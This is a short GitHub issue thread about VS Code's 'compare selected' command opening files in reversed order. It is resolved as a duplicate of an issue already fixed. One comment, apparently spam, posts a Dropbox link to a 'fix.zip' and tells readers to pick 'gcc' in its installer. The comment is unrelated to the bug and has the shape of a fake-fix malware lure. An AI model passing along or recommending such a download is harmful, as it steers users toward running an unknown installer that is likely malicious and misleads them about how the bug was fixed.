### ISSUE TITLE
Change the file order in `compare selected` to reversed

### ISSUE THREAD

**Issue by sunshaoce** [microsoft/vscode#226573]
Does this issue occur when all extensions are disabled?: Yes

```
Version: 1.92.2 (system setup)
Commit: fee1edb8d6d72a0ddff41e5f71a671c23ed924b9
Date: 2024-08-14T17:29:30.058Z
Electron: 30.1.2
ElectronBuildId: 9870757
Chromium: 124.0.6367.243
Node.js: 20.14.0
V8: 12.4.254.20-electron.0
OS: Windows_NT x64 10.0.19045
```

Steps to Reproduce:

1. Select `File A`
2. Select `File B`
3. Click  `compare selected`
4. Then you will see a New Tab, named `B ↔ A`, but former is  `A ↔ B`
![image](https://github.com/user-attachments/assets/f030781e-2d83-4807-8bbc-598f51097f4b)

**Comment by esttemanb** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by gjsjohnmurray** [comment]
Looks like a duplicate of #225441, according to which has been fixed in upcoming 1.93

**Comment by sunshaoce** [comment]
Thank @gjsjohnmurray for the reply. I am closing this issue because it is a duplicate.
